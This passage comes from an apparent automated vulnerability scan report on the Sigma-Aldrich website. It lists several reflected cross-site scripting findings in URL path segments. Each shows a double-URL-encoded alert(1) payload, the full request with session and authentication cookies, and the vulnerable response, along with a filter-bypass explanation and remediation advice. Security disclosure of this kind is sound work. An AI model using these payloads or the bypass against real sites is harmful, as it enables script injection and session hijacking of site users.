bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalogea66d";alert(1)//0e85a483f8f/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.461. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db2%2522%253balert%25281%2529%252f%252f9bb269c26d5 was submitted in the REST URL parameter 6. This input was echoed as d1db2";alert(1)//9bb269c26d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icond1db2%2522%253balert%25281%2529%252f%252f9bb269c26d5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icond1db2";alert(1)//9bb269c26d5","E404") ;
   </script>
...[SNIP]...

1.462. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6820d%2522%253balert%25281%2529%252f%252f6a954d68043 was submitted in the REST URL parameter 1. This input was echoed as 6820d";alert(1)//6a954d68043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc6820d%2522%253balert%25281%2529%252f%252f6a954d68043/medialib/sigma-aldrich/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc6820d";alert(1)//6a954d68043/medialib/sigma-aldrich/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.463. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25756%2522%253balert%25281%2529%252f%252facc5422b7 was submitted in the REST URL parameter 2. This input was echoed as 25756";alert(1)//acc5422b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib25756%2522%253balert%25281%2529%252f%252facc5422b7/sigma-aldrich/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib25756";alert(1)//acc5422b7/sigma-aldrich/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.464. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5110d%2522%253balert%25281%2529%252f%252fd756c1744f1 was submitted in the REST URL parameter 3. This input was echoed as 5110d";alert(1)//d756c1744f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich5110d%2522%253balert%25281%2529%252f%252fd756c1744f1/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich5110d";alert(1)//d756c1744f1/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.465. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ad3%2522%253balert%25281%2529%252f%252f6747eed535d was submitted in the REST URL parameter 4. This input was echoed as 28ad3";alert(1)//6747eed535d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images28ad3%2522%253balert%25281%2529%252f%252f6747eed535d/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
